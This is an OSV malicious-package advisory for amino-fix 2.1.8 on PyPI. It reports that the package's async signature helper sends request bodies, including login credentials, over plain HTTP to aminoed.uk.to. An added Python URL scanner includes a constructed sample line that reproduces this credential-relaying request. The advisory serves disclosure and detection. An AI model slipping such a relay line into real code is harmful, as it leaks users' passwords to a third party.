MAL-2026-3686

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/amino-fix/MAL-2026-3686.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3686
Published
2026-05-13T00:19:49Z
Modified
2026-06-15T03:00:55.097953687Z
Summary
Malicious code in amino-fix (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44)

The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password) — the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and all other request bodies) as URL query parameters to aminoed.uk.to, a free .uk.to subdomain unrelated to the real Amino service (service.narvii.com). This is a textbook silent-relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS. A secondary import-time version-check against pypi.org is benign (data-only, printed to stdout) and not a dropper, but is noted as an unrelated quality issue.
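The pattern described above (a hardcoded third-party host, reached over plaintext HTTP, with caller data spliced into the query string) is something a package reviewer can look for mechanically. The following is an added example, not code from the advisory, the amino-fix package or the OSV project: it parses Python source with the standard `ast` module, collects every string literal and f-string that parses as an http(s) URL, and reports those whose host is not on an expected-host allowlist, noting whether the scheme is plaintext and whether the URL has interpolated parts. The allowlist of `service.narvii.com` and `pypi.org` is taken from the advisory text; the `SAMPLE_SOURCE` is a constructed stand-in that mirrors the described pattern and is not the package's code.

```python
import ast
from urllib.parse import urlsplit

# Hosts the library is legitimately expected to contact. Both are named in
# the advisory (the real Amino API and the benign pypi.org version check);
# a reviewer would tune this set per project.
EXPECTED_HOSTS = {"service.narvii.com", "pypi.org"}

# Constructed sample mirroring the advisory's description; NOT the package's code.
SAMPLE_SOURCE = '''\
import requests

API = "https://service.narvii.com/api/v1"

def version_check():
    return requests.get("https://pypi.org/pypi/amino-fix/json").json()

def signature(data):
    return requests.get(f"http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data}").text
'''


class _UrlLiteralCollector(ast.NodeVisitor):
    """Collects plain string literals and f-strings from a parsed module."""

    def __init__(self):
        self.literals = []  # (lineno, text, interpolated)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            self.literals.append((node.lineno, node.value, False))

    def visit_JoinedStr(self, node):
        # Keep the literal pieces, mark each interpolated slot, and do not
        # descend into the constant pieces (that would double-count them).
        pieces = []
        for part in node.values:
            if isinstance(part, ast.Constant) and isinstance(part.value, str):
                pieces.append(part.value)
            else:
                pieces.append("{...}")
                self.visit(part)  # nested literals inside the expression
        self.literals.append((node.lineno, "".join(pieces), True))


def find_hardcoded_destinations(source, expected_hosts=EXPECTED_HOSTS):
    """Return every hardcoded http(s) URL whose host is not allowlisted.

    Each finding records whether the URL is plaintext HTTP and whether the
    literal has interpolated parts feeding its query string, i.e. caller data
    being spliced into the request to an unexpected host.
    """
    collector = _UrlLiteralCollector()
    collector.visit(ast.parse(source))
    findings = []
    for lineno, text, interpolated in collector.literals:
        try:
            parts = urlsplit(text.strip())
        except ValueError:  # e.g. an unbalanced '[' in the netloc
            continue
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        if parts.hostname in expected_hosts:
            continue
        findings.append({
            "line": lineno,
            "host": parts.hostname,
            "plaintext": parts.scheme == "http",
            "data_in_query": interpolated and "?" in text,
        })
    return findings


if __name__ == "__main__":
    for finding in find_hardcoded_destinations(SAMPLE_SOURCE):
        print(finding)
```

Run against the sample, the scanner ignores the two allowlisted hosts and reports the single unexpected destination on line 9 as plaintext with interpolated query data, which is exactly the combination the advisory calls a silent relay. An HTTPS destination to an unlisted host is still reported (with `plaintext` set to `False`), since a hardcoded third-party endpoint is the core concern regardless of transport.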

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-002585",
            "import_time": "2026-05-13T20:11:01.266429227Z",
            "sha256": "807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44",
            "source": "amazon-inspector",
            "modified_time": "2026-05-13T00:19:49Z",
            "versions": [
                "2.1.8"
            ]
        }
    ]
}
References
Credits

Affected packages

Package: PyPI / amino-fix
Affected ranges: 2.*
Affected versions: 2.1.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "aminofix/asyncfix/lib/util/helpers.py",
            "sha256": "c93e662de27505e4f274e0980af9a399caf5cfe4b8557248abf3f3dc20084be3",
            "tlsh": "e42124e7b863b59113bc42b970184022fb7f9ae25fc81083b80d42b4372ac299a3547d"
        },
        {
            "path": "aminofix/__init__.py",
            "sha256": "47921dcff69216c8a6e6d862c23af503a7440106ce2634934c2f0deab737162c",
            "tlsh": "7101c023423fe733b13e8bcec0035034ab3358705f8fb0a266905abc37c22418759888"
        }
    ],
    "package_integrity": [
        {
            "filename": "amino.fix-2.1.8-py3-none-any.whl",
            "hashes": {
                "md5": "ddc4616e89ea830404293e8be3b3a90d",
                "blake2b_256": "9f5f0bcb8f9c9a042d2179c351e9e2068c6bb21e7fa5c306dad3cb1de73e9527",
                "sha256": "2a94934bcfa50d3b329a067233af995861151ee82df1ebc404c7e2612ae37030"
            }
        },
        {
            "filename": "amino.fix-2.1.8.tar.gz",
            "hashes": {
                "md5": "19171c7a733d0094eb04a7f6b360c4d8",
                "blake2b_256": "99d3e0ecdc4ceae60e65486f85fcb180f949bd435a79d8c43c11d20d251ff347",
                "sha256": "ba1c0691642164fa523bf2d11ff448af26e7869f195a69d4e9909346480348e7"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/amino-fix/MAL-2026-3686.json"